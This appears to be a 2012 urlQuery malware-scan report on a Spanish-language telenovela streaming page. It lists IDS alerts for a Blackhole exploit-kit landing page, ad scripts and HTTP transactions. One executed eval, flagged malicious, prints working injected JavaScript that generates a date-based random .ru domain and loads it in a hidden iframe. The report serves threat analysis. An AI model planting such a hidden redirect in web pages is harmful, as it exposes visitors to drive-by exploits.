Overview

URLhttp://www.tvnovela.tv/televisa-en-vivo.html
IP184.173.213.119
ASNAS36351 SoftLayer Technologies Inc.
Location United States
Report completed2012-11-09 13:40:02 CET
StatusLoading report..
urlQuery Alerts Detected script marked as malicious
Detected SutraTDS URL pattern


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Source IP Destination IP Severity Alert
2012-11-09 13:39:31 195.159.219.9 urlQuery Client3FILEMAGIC Macromedia Flash data (compressed),
2012-11-09 13:39:32 195.159.219.10 urlQuery Client3FILEMAGIC Macromedia Flash data (compressed),
Snort /w Sourcefire VRT
Timestamp Source IP Destination IP Severity Alert
2012-11-09 13:39:29 184.173.213.119 urlQuery Client1EXPLOIT-KIT Blackhole landing page with specific structure - Math.round catch
2012-11-09 13:39:33 184.173.213.119 urlQuery Client1EXPLOIT-KIT Blackhole landing page with specific structure - Math.round catch


Recent reports on same IP/ASN/Domain

Last 3 reports on IP: 184.173.213.119

Date Alerts / IDS URL IP
2012-11-21 06:52:280 / 3http://www.tvnovela.tv/tag/la-casa-de-al-lado-videos184.173.213.119
2012-11-13 11:15:192 / 5http://www.tvnovela.tv/un-refugio-para-el-amor-capitulo-3-online-televisa.html184.173.213.119
2012-10-25 15:26:122 / 0http://www.tvnovela.tv/wp-content/themes/vivex/img/mainnav-sep.gif184.173.213.119

Last 6 reports on ASN: AS36351 SoftLayer Technologies Inc.

Date Alerts / IDS URL IP
2013-02-13 06:07:090 / 0http://markswood.co.uk/bymqp/dxu/1lc04bqdptn5c1iqez9a9ot4au60gdtxpv9chjn4b3uu3y?t9fm9kkmhvwwrpm (...)74.86.126.82
2013-02-13 05:51:011 / 0http://b2missions.com/albums/columbus_luperon/image_16.html67.228.0.97
2013-02-13 05:45:210 / 4http://creativechowk.com/332.jar50.22.107.97
2013-02-13 05:45:191 / 3http://mesothelioma-care.com/2012/11/21/173.192.222.70
2013-02-13 05:44:530 / 1http://medyumazime.com/987.pdf50.22.112.127
2013-02-13 05:44:030 / 1http://wowfactoryfunbirthdayspecials1.com/332.jar184.172.183.162

Last 3 reports on domain: www.tvnovela.tv

Date Alerts / IDS URL IP
2012-11-21 06:52:280 / 3http://www.tvnovela.tv/tag/la-casa-de-al-lado-videos184.173.213.119
2012-11-13 11:15:192 / 5http://www.tvnovela.tv/un-refugio-para-el-amor-capitulo-3-online-televisa.html184.173.213.119
2012-10-25 15:26:122 / 0http://www.tvnovela.tv/wp-content/themes/vivex/img/mainnav-sep.gif184.173.213.119



JavaScript

Executed Scripts (42)


Executed Evals (2)

#1 JavaScript::Eval (size: 1769, repeated: 1) - Script marked as malicious

function nextRandomNumber() {
    var hi = this.seed / this.Q;
    var lo = this.seed % this.Q;
    var test = this.A * lo - this.R * hi;
    if (test > 0) {
        this.seed = test;
    } else {
        this.seed = test + this.M;
    }
    return (this.seed * this.oneOverM);
}

function RandomNumberGenerator(unix) {
    var d = new Date(unix * 1000);
    var s = Math.ceil(d.getHours() / 3);
    this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
    this.A = 48271;
    this.M = 2147483647;
    this.Q = this.M / this.A;
    this.R = this.M % this.A;
    this.oneOverM = 1.0 / this.M;
    this.next = nextRandomNumber;
    return this;
}

function createRandomNumber(r, Min, Max) {
    return Math.round((Max - Min) * r.next() + Min);
}

function generatePseudoRandomString(unix, length, zone) {
    var rand = new RandomNumberGenerator(unix);
    var letters = "buaxoqeriqwkgfkdyenzossqlxfqayvpr".split('');
    var str = '';
    for (var i = 0; i < length; i++) {
        str += letters[createRandomNumber(rand, 0, letters.length - 1)];
    }
    return str + '.' + zone;
}

setInterval(function() {
    try {
        if (typeof iframeWasCreated == "undefined") {
            var unix = Math.round(+new Date() / 1000);
            var domainName = generatePseudoRandomString(unix, 16, 'ru');
            ifrm = document.createElement("IFRAME");
            ifrm.setAttribute("src", "http://" + domainName + "/in.cgi?15");
            ifrm.style.width = "0px";
            ifrm.style.height = "0px";
            ifrm.style.visibility = "hidden";
            document.body.appendChild(ifrm);
            iframeWasCreated = true;
        }
    } catch (e) {
        iframeWasCreated = undefined;
    }
}, 100);

#2 JavaScript::Eval (size: 18, repeated: 1)

self.location.href

Executed Writes (15)

#1 JavaScript::Write (size: 269, repeated: 1)

<IMG width=0 height=0 src="http://b.scorecardresearch.com/p?c1=8&c2=7936279&c3=0&cv=2.0&cj=1" style="margin:0;padding:0;display:none;"/><IMG width=0 height=0 src="http://pixel.quantserve.com/pixel/p-70x45KyHA6cIs.gif?media=ad" style="margin:0;padding:0;display:none;"/>

#2 JavaScript::Write (size: 118, repeated: 1)

<IMG width=0 height=0 src="http://pxses.smowtion.com/pixel.gif?id=3488682"  style="margin:0;padding:0;display:none;"/>

#3 JavaScript::Write (size: 2559, repeated: 1)

<OBJECT id="7286894848097103975" data="http://cdn.adnxs.com/p/68/34/1f/d2/68341fd2b8532ca39fcfde9bdcc59c49.swf" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="468" HEIGHT="60" flashvars="clickTag=http%3A%2F%2Fib.adnxs.com%2Fclick%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAGewc7hBQCBloArzhH1cTlGE-ZxQAAAAAI12DgAdAgAAHQIAAAIAAADJfysAWaMCAAAAAQBVU0QAVVNEANQBPACAOQAAHlMAAgQCAQUAAIQAWxOFwwAAAAA.%2Fcnd%3D%2521PwbYNwjqwh8Qyf-tARjZxgogBA..%2Freferrer%3Dhttp%253A%252F%252Fwww.castamp.com%252F468x60-2.html%253F526770425%2Fclickenc%3Dhttp%253A%252F%252Fwww.qubble.com%252Fonline_ads%252Findex.php%253Fdata%253DNO_IPHONE4S.swf%2526affid%253DCPX2%2526type%253DNM%2526sem%253DN%2526stype%253DSCENARIO%2526vas%253D24183%2526apn%253Dams1CKCVzKfYj5enURACGOfgzsObiJCQZSIOODAuMjAzLjE2OC4yNTQoAQ.."><PARAM NAME=movie VALUE="http://cdn.adnxs.com/p/68/34/1f/d2/68341fd2b8532ca39fcfde9bdcc59c49.swf"><PARAM NAME=loop VALUE=true><PARAM NAME=menu VALUE=false><PARAM NAME=quality VALUE=high><PARAM NAME=wmode VALUE="opaque"><PARAM NAME=bgcolor VALUE=#FFFFFF><PARAM NAME=allowscriptaccess VALUE=always><PARAM NAME=flashvars VALUE="clickTag=http%3A%2F%2Fib.adnxs.com%2Fclick%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAGewc7hBQCBloArzhH1cTlGE-ZxQAAAAAI12DgAdAgAAHQIAAAIAAADJfysAWaMCAAAAAQBVU0QAVVNEANQBPACAOQAAHlMAAgQCAQUAAIQAWxOFwwAAAAA.%2Fcnd%3D%2521PwbYNwjqwh8Qyf-tARjZxgogBA..%2Freferrer%3Dhttp%253A%252F%252Fwww.castamp.com%252F468x60-2.html%253F526770425%2Fclickenc%3Dhttp%253A%252F%252Fwww.qubble.com%252Fonline_ads%252Findex.php%253Fdata%253DNO_IPHONE4S.swf%2526affid%253DCPX2%2526type%253DNM%2526sem%253DN%2526stype%253DSCENARIO%2526vas%253D24183%2526apn%253Dams1CKCVzKfYj5enURACGOfgzsObiJCQZSIOODAuMjAzLjE2OC4yNTQoAQ.."><OBJECT TYPE="application/x-shockwave-flash" data="http://cdn.adnxs.com/p/68/34/1f/d2/68341fd2b8532ca39fcfde9bdcc59c49.swf?clickTag=http%3A%2F%2Fib.adnxs.com%2Fclick%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAGewc7hBQCBloArzhH1cTlGE-ZxQAAAAAI12DgAdAgAAHQIAAAIAAADJfysAWaMCAAAAAQBVU0QAVVNEANQBPACAOQAAHlMAAgQCAQUAAIQAWxOFwwAAAAA.%2Fcnd%3D%2521PwbYNwjqwh8Qyf-tARjZxgogBA..%2Freferrer%3Dhttp%253A%252F%252Fwww.castamp.com%252F468x60-2.html%253F526770425%2Fclickenc%3Dhttp%253A%252F%252Fwww.qubble.com%252Fonline_ads%252Findex.php%253Fdata%253DNO_IPHONE4S.swf%2526affid%253DCPX2%2526type%253DNM%2526sem%253DN%2526stype%253DSCENARIO%2526vas%253D24183%2526apn%253Dams1CKCVzKfYj5enURACGOfgzsObiJCQZSIOODAuMjAzLjE2OC4yNTQoAQ.." width="468" height="60" wmode="opaque" allowscriptaccess="always"></OBJECT></OBJECT>

#4 JavaScript::Write (size: 156, repeated: 1)

<SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/imp?Z=0x0&y=28&S=INSERT%5fSECTION%5fCODE%5fHERE&i=991315&_salt=4141907090&B=10&r=0"></SCRIPT>

#5 JavaScript::Write (size: 240, repeated: 1)

<SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/imp?Z=300x250&S=3718825&i=991315&T=3&_salt=2189805042&B=10&u=http%3A%2F%2Fwww.castamp.com%2Fembed.php%3Fc%3Dlopezdd%26tk%3DNbPNrVie%26vwidth%3D608%26vheight%3D470&r=0"></SCRIPT>

#6 JavaScript::Write (size: 304, repeated: 1)

<SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/imp?Z=800x440&position=btf&s=3488682&suid=98aeaa9a%2daaaa%2d41ff%2da5f0%2d30fc83701a29&t_url=http%3a%2f%2fwww.tvnovela.tv%2ftelevisa%2den%2dvivo.html&_salt=2845216435&B=10&u=http%3A%2F%2Fwww.tvnovela.tv%2Ftelevisa-en-vivo.html&r=1"></SCRIPT>

#7 JavaScript::Write (size: 179, repeated: 1)

<SCRIPT TYPE="text/javascript" SRC="http://ts.smowtion.com/st?ad_type=ad&ad_size=800x440&section=3488682&position=btf&t_url=http://www.tvnovela.tv/televisa-en-vivo.html"></SCRIPT>

#8 JavaScript::Write (size: 556, repeated: 1)

<a target="_blank" href="http://ad.xtendmedia.com/clk?3,eJytTUFugzAQfA03gowp4Aj1YESpQIFCRYPCzYDBDnGgrRvSvL4mifKCjlajmdlZrWl5DbC6unMdiyBEOtB5pkWoDemideB5HoTAcW3bgWt9h7MZE7F6w36y7gcfX2Fus.ymcL9QdNMZWvg1EIOI72sebd.xv8AvIozuOrr-7QOEV5.gxy5G.1EL-t-qzEFa5nBTxCwVLzIpwkPCTVbtP86bMr9UQXROy1Ts9jFP88fls64zKSfNwhoM1czzbDTkWxIxGc0oVEJFTVtjYqoTNpoVHMaJXtpWg44clD3W0.HrxKnyp5m3kqnMAWixjPKeSeWfXPAHiLVwZQ==,"><img border="0" alt="" height="250" width="300" src="http://content.yieldmanager.edgesuite.net/atoms/a7/c4/19/cf/a7c419cf8765831e7f08878508323ecc.gif"></img></a>

#9 JavaScript::Write (size: 69, repeated: 1)

<div style="width:1px;height:1px;margin:0;padding:0" id="7554"></div>

#10 JavaScript::Write (size: 296, repeated: 1)

<iframe src="http://ads.adk2.com/player.html?a=6581207&size=300x250&ci=1&u=http%3A%2F%2Fwww.castamp.com%2Fembed.php%3Fc%3Dlopezdd%26tk%3DNbPNrVie%26vwidth%3D608%26vheight%3D470&r=" height="250" width="300" frameborder="0" border="0"  scrolling="no" marginheight="0px" marginwidth="0px" ></iframe>

#11 JavaScript::Write (size: 198, repeated: 1)

<iframe src="http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>

#12 JavaScript::Write (size: 186, repeated: 1)

<iframe src="http://www.castamp.com/embed.php?c=lopezdd&tk=NbPNrVie&vwidth=608&vheight=470" width=608 height=470 scrolling=no frameborder=0 scrolling=no allowtransparency=true ></iframe>

#13 JavaScript::Write (size: 1141, repeated: 1)

<object type="application/x-shockwave-flash" data="http://content.yieldmanager.edgesuite.net/atoms/a2/a0/b7/56/a2a0b756a8b96868e5287a36bc7bc28c.swf?clickTAG=http%3A%2F%2Fad%2Esmowtion%2Ecom%2Fclk%3F3%2CeJydjM1uwjAQhJ%2DGW0D%2DwcKV1cOCAZWS0EjmQG6OMXHahIDqOlKevgEieu9otfpmd3YxFZzkp5wZTRFj9Ii4wFRbRqw%2DWRwhIQSfzhjDhE0juOm9mSXpIifWwMObwy59IBR3P7%2EzB7%2E1tbwiq4b14sUlAxV638L%2EJS%2EgDgO%2EAfSvCsnheOU%2ETDXzv1jRxZ8G7dZ7tFUbl9RLH6tVFZeIZXJTbpWrs3pJk87gTH51Wfq8fI0i5%2E1lRGFEVn21bTvx4dwEW%2Dke%2Dom3lQ3ltx7b8ziUoZk4X1e%2EF4BiMg%3D%3D%2C" height="440" width="800" loop="false" wmode="opaque"><param name="wmode" value="opaque"><param name="movie" value="http://content.yieldmanager.edgesuite.net/atoms/a2/a0/b7/56/a2a0b756a8b96868e5287a36bc7bc28c.swf?clickTAG=http%3A%2F%2Fad%2Esmowtion%2Ecom%2Fclk%3F3%2CeJydjM1uwjAQhJ%2DGW0D%2DwcKV1cOCAZWS0EjmQG6OMXHahIDqOlKevgEieu9otfpmd3YxFZzkp5wZTRFj9Ii4wFRbRqw%2DWRwhIQSfzhjDhE0juOm9mSXpIifWwMObwy59IBR3P7%2EzB7%2E1tbwiq4b14sUlAxV638L%2EJS%2EgDgO%2EAfSvCsnheOU%2ETDXzv1jRxZ8G7dZ7tFUbl9RLH6tVFZeIZXJTbpWrs3pJk87gTH51Wfq8fI0i5%2E1lRGFEVn21bTvx4dwEW%2Dke%2Dom3lQ3ltx7b8ziUoZk4X1e%2EF4BiMg%3D%3D%2C" /></object>

#14 JavaScript::Write (size: 321, repeated: 1)

<script type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=468x60&inv_code=2833602&referrer=http%3A%2F%2Fwww.castamp.com%2F468x60-2.html%3F526770425&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D468x60%26section%3D2833602"></script>

#15 JavaScript::Write (size: 498, repeated: 1)

<script> var _comscore = _comscore || []; _comscore.push({ c1: "8", c2: "6035951", c3: "144877" }); (function() { var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true; s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js"; el.parentNode.insertBefore(s, el); })(); </script> <noscript> <img src="http://b.scorecardresearch.com/p?c1=8&c2=&c3=&c4=&c5=&c6=&c15=&cv=2.0&cj=1" /> </noscript>


HTTP Transactions (64)


Request Response
GET /televisa-en-vivo.html HTTP/1.1

Host: www.tvnovela.tv

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Fri, 09 Nov 2012 12:39:28 GMT
Server: Apache
Link: &lt;http://www.tvnovela.tv/?p=581&gt;; rel=shortlink
Vary: Accept-Encoding,Cookie,User-Agent
X-Powered-By: W3 Total Cache/0.9.2.4
Content-Encoding: gzip
X-Pingback: http://www.tvnovela.tv/xmlrpc.php
Last-Modified: Fri, 09 Nov 2012 12:39:29 GMT
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /embed.js HTTP/1.1

Host: castamp.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tvnovela.tv/televisa-en-vivo.html
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: nginx
Date: Fri, 09 Nov 2012 12:41:51 GMT
Content-Length: 560
Last-Modified: Mon, 10 Sep 2012 02:19:03 GMT
Connection: close
Etag: &quot;504d4e17-230&quot;
Accept-Ranges: bytes
GET /wp-content/w3tc/min/f6e95b9e.fac7b4.css HTTP/1.1

Host: www.tvnovela.tv

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tvnovela.tv/televisa-en-vivo.html
HTTP/1.1 200 OK

Content-Type: text/css
Date: Fri, 09 Nov 2012 12:39:29 GMT
Server: Apache
Vary: Accept-Encoding
Last-Modified: Thu, 08 Nov 2012 18:02:51 GMT
Accept-Ranges: bytes
Content-Length: 11099
X-Powered-By: W3 Total Cache/0.9.2.4
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Encoding: gzip
GET /js/plusone.js HTTP/1.1

Host: apis.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tvnovela.tv/televisa-en-vivo.html
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: application/javascript; charset=utf-8
X-UA-Compatible: IE=edge, chrome=1
Etag: &quot;cbf09d00f756da0e0ac425a3ad55dc5e&quot;
Expires: Fri, 09 Nov 2012 12:39:29 GMT
Date: Fri, 09 Nov 2012 12:39:29 GMT
Cache-Control: private, max-age=1800
Content-Encoding: gzip
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
GET /wp-content/themes/twentyeleven/images/headers/pine-cone.jpg HTTP/1.1

Host: www.tvnovela.tv

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tvnovela.tv/televisa-en-vivo.html
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Fri, 09 Nov 2012 12:39:29 GMT
Server: Apache
Last-Modified: Wed, 08 Aug 2012 03:47:44 GMT
Accept-Ranges: bytes
Content-Length: 39112
Vary: User-Agent
X-Powered-By: W3 Total Cache/0.9.2.4
Keep-Alive: timeout=5, max=74
Connection: Keep-Alive
GET /wp-content/w3tc/min/848db130.8a8c24.js HTTP/1.1

Host: www.tvnovela.tv

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tvnovela.tv/televisa-en-vivo.html
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Fri, 09 Nov 2012 12:39:29 GMT
Server: Apache
Vary: Accept-Encoding
Last-Modified: Thu, 08 Nov 2012 18:03:33 GMT
Accept-Ranges: bytes
Content-Length: 67856
X-Powered-By: W3 Total Cache/0.9.2.4
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Encoding: gzip
GET /ad.js?s=3488682&z=800x440 HTTP/1.1

Host: ads.smowtion.com
GET /ad.js?s=3488682&amp;z=800x440 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tvnovela.tv/televisa-en-vivo.html
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=utf-8
Server: Apache
Last-Modified: Mon, 17 Sep 2012 20:01:22 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 1035
Cache-Control: max-age=604800
Date: Fri, 09 Nov 2012 12:39:30 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /_/apps-static/_/js/gapi/plusone/rt=j/ver=QsxprL00njE.no./sv=1/am=!UINAgHOiu5aIzovkDQ/d=1/rs=AItRSTM7EbkTqf6RHV1s2iNY462rZDmvSA/cb=gapi.loaded_0 HTTP/1.1

Host: apis.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tvnovela.tv/televisa-en-vivo.html
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Etag: &quot;-39809713&quot;
Expires: Sat, 08 Dec 2012 01:59:55 GMT
Date: Thu, 08 Nov 2012 01:59:55 GMT
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=2592000
Content-Length: 27860
Age: 124775
GET /wp-content/themes/twentyeleven/images/search.png HTTP/1.1

Host: www.tvnovela.tv

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tvnovela.tv/wp-content/w3tc/min/f6e95b9e.fac7b4.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Fri, 09 Nov 2012 12:39:30 GMT
Server: Apache
Last-Modified: Wed, 08 Aug 2012 03:47:44 GMT
Accept-Ranges: bytes
Content-Length: 441
Vary: User-Agent
X-Powered-By: W3 Total Cache/0.9.2.4
Keep-Alive: timeout=5, max=74
Connection: Keep-Alive
GET /wp-content/themes/twentyeleven/images/comment-arrow.png HTTP/1.1

Host: www.tvnovela.tv

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tvnovela.tv/wp-content/w3tc/min/f6e95b9e.fac7b4.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Fri, 09 Nov 2012 12:39:30 GMT
Server: Apache
Last-Modified: Wed, 08 Aug 2012 03:47:44 GMT
Accept-Ranges: bytes
Content-Length: 250
Vary: User-Agent
X-Powered-By: W3 Total Cache/0.9.2.4
Keep-Alive: timeout=5, max=73
Connection: Keep-Alive
GET /avatar/f49580e78222f41b09d64a860e6ca3aa?s=68&d=&r=G HTTP/1.1

Host: 1.gravatar.com
GET /avatar/f49580e78222f41b09d64a860e6ca3aa?s=68&amp;d=&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tvnovela.tv/televisa-en-vivo.html
HTTP/1.1 200 OK

Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Content-Disposition: inline; filename=&quot;f49580e78222f41b09d64a860e6ca3aa.jpg&quot;
Date: Fri, 09 Nov 2012 12:39:30 GMT
Expires: Fri, 09 Nov 2012 12:44:30 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: nginx
Source-Age: 0
Via: 1.1 varnish
X-Varnish: 2134668394
Content-Length: 2425
GET /embed.php?c=lopezdd&tk=NbPNrVie&vwidth=608&vheight=470 HTTP/1.1

Host: www.castamp.com
GET /embed.php?c=lopezdd&amp;tk=NbPNrVie&amp;vwidth=608&amp;vheight=470 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tvnovela.tv/televisa-en-vivo.html
HTTP/1.1 200 OK

Content-Type: text/html
Server: nginx
Date: Fri, 09 Nov 2012 12:41:52 GMT
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.4.8
Content-Encoding: gzip
GET /tvespanolenvivo/playazteca.jpg HTTP/1.1

Host: www.onlinetv.planetfools.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tvnovela.tv/televisa-en-vivo.html
HTTP/1.1 403 Forbidden

Content-Type: text/html
Date: Fri, 09 Nov 2012 12:39:28 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.16
Accept-Ranges: bytes
Content-Length: 68729
Connection: close
GET /300x250.html?943540167 HTTP/1.1

Host: www.castamp.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.castamp.com/embed.php?c=lopezdd&amp;tk=NbPNrVie&amp;vwidth=608&amp;vheight=470
HTTP/1.1 200 OK

Content-Type: text/html
Server: nginx
Date: Fri, 09 Nov 2012 12:41:52 GMT
Content-Length: 463
Last-Modified: Thu, 16 Aug 2012 23:30:33 GMT
Connection: close
Etag: &quot;502d8299-1cf&quot;
Accept-Ranges: bytes
GET /js/swfobject.js HTTP/1.1

Host: www.castamp.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.castamp.com/embed.php?c=lopezdd&amp;tk=NbPNrVie&amp;vwidth=608&amp;vheight=470
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: nginx
Date: Fri, 09 Nov 2012 12:41:52 GMT
Content-Length: 6880
Last-Modified: Thu, 16 Aug 2012 21:05:40 GMT
Connection: close
Etag: &quot;502d60a4-1ae0&quot;
Accept-Ranges: bytes
GET /images/close.png HTTP/1.1

Host: www.castamp.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
